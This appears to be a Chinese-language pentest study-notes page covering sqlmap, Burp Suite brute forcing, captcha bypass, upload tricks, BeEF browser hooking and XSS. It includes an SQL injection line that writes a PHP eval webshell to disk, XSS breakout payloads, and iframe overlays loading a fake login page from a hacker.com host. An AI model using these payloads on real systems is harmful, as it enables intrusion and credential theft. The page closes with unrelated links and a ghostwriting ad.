sqlmap续

注入语句(知道绝对路径时候可用)

http://192.168.99.171/test2/sqli/example10.php?catid=3’union select 1,’<? @eval($_POST[xy])?>’,3,4 into outfile ‘C:/xampp/htdocs/test2/xinyu2.php‘--+

检测注入:http://192.168.99.171/test/xinyu2.php若有返回内容则已经写入

form表单

--random-agent 随机请求

--cookie=COOKIE 身份赋予

--technique=TECH    SQL injection techniques to use (default "BEUSTQ")T时间E错误C

--dns-domain=DNS..  Domain name used for DNS exfiltration attack

--DNS域=DNS..用于DNS渗出攻击的域名

burp与wireshark的区别

http协议抓包工具burp,能改能发,实时互动

wireshark不能改只能抓住

burp:

target(目标) proxy(代理) spider scanner intruder repeater sequencer decoder compare extend options

详情:

https://blog.csdn.net/lynnlinlin/article/details77488947/

http://blog.csdn.net/lynnlinlin/article/details/76736972

http://blog.csdn.net/lynnlinlin/article/details/77480726

1) Proxy(代理)

代理功能使我们能够截获并修改请求.为了拦截请求,并对其进行操作,修改代理配置. 在这里我们可以编辑代理正在监听的端口.如果我们不选中"listen on loopback interface only"选项,意味着Burp Proxy可以作为一个网络上其它系统的代理。这意味着在同一网络中的任何计算机都可以使用Burp Proxy功能成为代理,并中继通过它的流量. "support invisible proxying for non-proxy-aware client"选项是用于客户端不知道他们使用的是代理的情况下.这意味着代理设置不是设置在浏览器,有时候设置在hosts文件中.在这种情况下,和将代理选项设置在浏览器本身所不同的是Burp需要知道它是从一个非代理客户端接收流量的."redirect to host"和"redirect to port"选项将客户端重定向到我们在该选项后设置的主机和端口。 这里有个选项用来修改从响应中接收到的html网页。我们可以取消隐藏的表单字段,删除javascript等。还有一个选项用自定义字符串替换掉寻找到的特定的模式.我们需要用指定正则表达式。Burp将解析请求或者响应以期望能够寻找到这种模式,将会用自定义的字符串来替换它.一旦Burp Spider提交一个登陆表单的时候就开始爬行(抓取).它可以自动提交我们提供给它的证书.我们同样可以设置admin/password凭证,设置好之后,他们会做为DVWA中的凭证.因此Burp Spider可以自动提交那些信息凭证,并且保持爬行抓取的状态希望能够获得更多的新的信息.你也可以在thread(线程)项来修改线程数. 这样就会启动Burp Spider,在Spider control标签下我们会看到正在做出的请求,我们也可以为Burp Spider自定义一个范围.

2)Intruder(入侵)

Burp Intruder可以用于利用漏洞,模糊测试,暴力猜解等。在这种情况下我们将使用Burp Suite的Intruder对DVWA进行暴力猜解攻击.浏览到DVWA,单击"Burp Force(暴力猜解)",随便输入username和password,确保Burp Suite上的"intercept is on(监听是打开的)".然后点击登陆 以上的操作会将请求信息发送给intruder功能.进入intruder标签,配置Burp Suite来发起暴力猜解的攻击.在target标签下可以看到已经设置好了要请求攻击的目标 单击右边的"clear"按钮,将会删除所有用不同颜色演示的重要的信息.接下来我们需要配置Burp在这次攻击中只把用户名和密码做为参数.选中本次请求中的username(本例中用户名是指"infosecinstiture")然后单击"Add(添加)".同样的将本次请求中的password也添加进去.这样操作之后,用户名和密码将会成为第一个和第二个参数.一旦你操作完成,输出的样子应该如下图所示: 接下来我们需要设置这次攻击的攻击类型,默认情况下的攻击类型是"Sniper(狙击手)",在本例中,我们将使用"Cluster Bomb(集束炸弹)"的攻击类型.有四种攻击类型,分别是singer,battering ram,pitchfork,cluster bomb.下图中我们看到的我们的攻击类型是"Cluster Bomb' 进入payload标签,确保"payload set"的值是1,点击"load(加载)"加载一个包含用户名的文件 。本例中我们使用一个很小的文件来进行演示.加载之后用户名文件中的用户名会如下图所示 同样设置"payload set"的值为2,点击"load"加载一个密码字典文件。 进入"options"标签,确保results下的"store requests"和"store responses"已经选择.

3)Repeater(中继转发) 通过Burp Repeater功能,我们可以手动修改一个请求,并且发送出去,来分析返回的响应.我们需要从不同的地方发送请求给Burp Repeater,比如入侵者,代理等.发送一个请求给Repeater,只需要单击右键"send to Repeater". 点开Repeater标签,会看到request,也可以看到名为1,2,3的3个标签. 我们也可以看到requestparams,header,hex和raw格式的请求,发送请求之前,我们可以修改其中的任何一个. 只修改Params请求下的username=admin,password=password,点击go,这样就会发送这个请求. 我们可以分析response部分返回的响应.

fuzz(模糊测试)

文件上传

第一个被检测而第二个不被检测

双文件上传

inurl:/ewebeditor.mdbà查找数据库

1.管理员后台

2.整站的rar压缩包(***.rar||***.zip)à代码审计

3.编辑器页面 和编辑器管理员后台à弱口令à文件上传

4.留言板à留言板后台à弱口令à文件上传

5.整站,编辑器,留言板的mdb数据库文件à下载数据库获得用户名密码

6.bak后缀文件(网站源码的备份文件)à拿到网站源码

7.其他攻击者留下的木马à破解密码登录

8.网站安装时留下的说明文件à敏感目录和初始用户名密码

GET POST

GET--》HEAD

index.php登录进去的界面

login.php登录界面

admin/verifycode.php验证代码(丢弃它)

绕过验证码(cookie)(burp)【刷新无效】à爆破登录

  1. 原理:验证码往往是单独的一个请求,如果不让它跳转就一直有效(丢弃验证的)
  2. 过程:
    1. 启动burp和一个打开的登录界面
    2. 在repeater里放弃一个验证的请求
    3. 到了提示密码错误或者用户名错误而不是验证码错误的时候,你就成功了
    4. 然后开始进行用户名密码爆破(用户名可以写一些注入语句)
    5. 比对长度查看与众不同的就是
    6. 注意:速度别太快…数据库会哭死的

脑痛的同源策略(约定判断四要素,cookie)

1.host(域名或ip地址,如果是ip地址则看做一个根域名)

2.子域名

3.端口

4.协议

流动ip

花生壳(动态dns解析)内网穿刺(带你的木马找到回家的路)

以及,FQ…

神奇的xss(精通JavaScript):

1.xss的原理:
脚本会在用户的浏览器上执行,从而达到攻击者的各种目的。

客户端嵌入恶意脚本代码

2.xss类型:

(1)反射型

(2)存储型

(3)本地型(dom型)

1.反射型:(php网页)

(1)恶意的客户端代码(html/javascript),是在服务器端合成的

(2)客户输入什么,不做检测,直接原样在客户端显示和执行

2.本地型(dom型):

DOM:document对象,是在JavaScript当中的一种元素

(1)恶意的客户端代码(html/javascript),是在浏览器端合成的

(2)客户输入什么,不做检测,直接原样在客户端显示和执行

3.存储型:

(1)恶意的客户端代码(html/javascript),存入数据库,或其他持久化形式

(2)客户输入什么,不做检测,直接原样在客户端显示和执行

(3)恶意代码在服务器端合成

beef神器

防beef静止浏览器多次请求,进行360防御-.-

使用详情http://netsecurity.51cto.com/art/201307/402179.htm

BeEF是浏览器攻击框架的简称,是一款专注于浏览器端的渗透测试工具。

beef beef

假设此时目标192.168.11.1的服务器访问了这个demo页面

http://192.168.11.152:3000/demos/basic.html。则就被hook上了,

实施攻击 HOOK持续的时间为关闭测试页面为止。在此期间,相当于被控制了,可以发送攻击命令了。选择commands栏,可以看到很多已经分好类的攻击模块。 其中,4种颜色分别表示: 该攻击模块可用,且隐蔽性强 该攻击模块可用,但隐蔽性差 该用户模块是否可用还有待验证 该攻击模块不可用

username=[X]

xss:

闭合:

"><script>alert(1)</script>

"/></textarea><script>alert(1)</script>

注意观察网页源码来使其闭合

xss盗取cookie

cookie即为身份,交流的牌牌,有一个其他人的身份你就成了其他人,然后一不小心就浏览到了后台页面

xss注入点:任意的输入位置,有输入,就有xss。

xss语句

<iframe src="http://www.hacker.com/xss/dy.html" height="400" width="100%" scrolling="no" frameborder="0"></iframe>

<iframe src="http://www.hacker.com//xss/login.html" height="100%" width="100%" scrolling="no" frameborder="0" style="position:absolute;top:0;margin:0;padding:0;left:0;

z-index:99999999;"></iframe>

短网址生成

sqlmap续的更多相关文章

  1. ORM查询语言(OQL)简介--高级篇(续):庐山真貌

    相关文章内容索引: ORM查询语言(OQL)简介--概念篇 ORM查询语言(OQL)简介--实例篇 ORM查询语言(OQL)简介--高级篇:脱胎换骨 ORM查询语言(OQL)简介--高级篇(续):庐山 ...

  2. .Net Core MVC 网站开发(Ninesky) 2.3、项目架构调整(续)-使用配置文件动态注入

    上次实现了依赖注入,但是web项目必须要引用业务逻辑层和数据存储层的实现,项目解耦并不完全:另一方面,要同时注入业务逻辑层和数据访问层,注入的服务直接写在Startup中显得非常臃肿.理想的方式是,w ...

  3. [.NET] C# 知识回顾 - 委托 delegate (续)

    C# 知识回顾 - 委托 delegate (续) [博主]反骨仔 [原文]http://www.cnblogs.com/liqingwen/p/6046171.html 序 上篇<C# 知识回 ...

  4. 关于sqlmap的使用

    好记性不如烂笔头,记录一下. 带cookie的注入 python sqlmap.py -u "http://www.xxx.com?id=1" --cookie="coo ...

  5. iOS 开发者账号到期续费流程

    1.登录developer.apple.com,查看到期时间 2.到期提醒通知,点击Renew Membership续费(一般提前一个月提醒续费) 3.个人开发者账号续费需要支付 688人民币/年(9 ...

  6. SQLMap Tamper Scripts Update 04/July/2016

    SQLMap Tamper Scripts Update apostrophemask.py Replaces apostrophe character with its UTF-8 full wid ...

  7. 定制sqlmap tamper脚本

    前言 渗透测试过程中遇到注入点常常丢到sqlmap中进行测试,假如网站有waf,sqlmap便无法直接注入了. 测试 在测试某个项目的过程中,一个页面的aid参数,习惯性的提交 and 1=1发现直接 ...

  8. sqlmap --dns-domain模拟实践

    因为看到乌云的这一篇文章 http://drop.xbclub.org/static/drops/tips-5283.html 里面的提到的用sqlmap 的--dns-domain 进行dns 注入 ...

  9. 微信公众号开发系列教程一(调试环境部署续:vs远程调试)

    http://www.cnblogs.com/zskbll/p/4080328.html 目录 C#微信公众号开发系列教程一(调试环境部署) C#微信公众号开发系列教程一(调试环境部署续:vs远程调试 ...

随机推荐

  1. 如何自学PHP做一个网站 PHP可以做什么项目?网站 小程序 公众号能用PHP开发吗?

    很多想从事程序开发的人员,想自学一门语言,不知道从哪里下手学习,如何入门学习?今天我们就以PHP为例子,来讲述一下如何快速的学习一门开发语言,让你快速入门.PHP是一个什么语言?它能开发什么项目呢?下 ...

  2. 程序代写, CS代写, 代码代写, CS编程代写, java代写, python代写, c++/c代写, R代写, 算法代写, web代写

    互联网一线工程师程序代写 微信联系 当天完成 查看大牛简介特色: 学霸代写,按时交付,保证原创,7*24在线服务,可加急.用心代写/辅导/帮助客户CS作业. 客户反馈与评价 服务质量:保证honor ...

  3. [代码修订版] Python 踩坑之旅进程篇其五打不开的文件

    目录 1.1 踩坑案例 1.2 填坑和分析 1.2.1 从程序优化入手 1.2.2 从资源软硬限入手 1.4.1 技术关键字 下期坑位预告 代码示例支持 平台: Centos 6.3 Python: ...

  4. .net core 杂记:WebAPI的XML请求和响应

    一般情况下,restfult api  进行数据返回或模型绑定,默认json格式会比较常见和方便,当然偶尔也会需要以XML格式的要求 对于返回XML,普通常见的方式就是在每个aciton方法进行诸如X ...

  5. iOS开发如何避免安全隐患

    现在很多iOS的APP没有做任何的安全防范措施,导致存在很多安全隐患和事故,今天我们来聊聊iOS开发人员平时怎么做才更安全. 一.网络方面 用抓包工具可以抓取手机通信接口的数据.以Charles为例, ...

  6. wireshark数据包分析实战 第一章

    1,数据包分析工具:tcpdump.wireshark.前者是命令行的,后者是图形界面的. 分析过程:收集数据.转换数据(二进制数据转换为可读形式).分析数据.tcpdump不提供分析数据,只将最原始 ...

  7. 从零到一,利用kubeadm在ubuntu server 16.04 64位系统离线安装kubernetes v1.10.0

    说明 初步接触kubernets,记录学习过程 本教程目的利用kubeadm在ubuntu server 16.04 64位系统离线安装kubernets v1.10.0 环境信息 节点IP地址 角色 ...

  8. 解决Spring的java项目打包后执行出现“无法读取方案文档...“、“原因为 1) 无法找到文档; 2) 无法读取文档; 3) 文档的根元素不是...”问题

    问题 一个用Spring建的java项目,在Eclipse或idea中运行正常,为什么打包后运行出现如下错误呢? 2019/07/10/19:04:07 WARN [main] org.springf ...

  9. Flutter学习笔记(5)--Dart运算符

    如需转载,请注明出处:Flutter学习笔记(5)--Dart运算符 先给出一个Dart运算符表,接下来在逐个解释和使用.如下:                            描述       ...

  10. Innovus Lab和Lab Guide下载地址 | Innovus教程 - Flow系列 - 数据准备

    本文转自:自己的微信公众号<集成电路设计及EDA教程> <Innovus Lab和Lab Guide下载地址 |    Innovus教程 - Flow系列 - 数据准备>   ...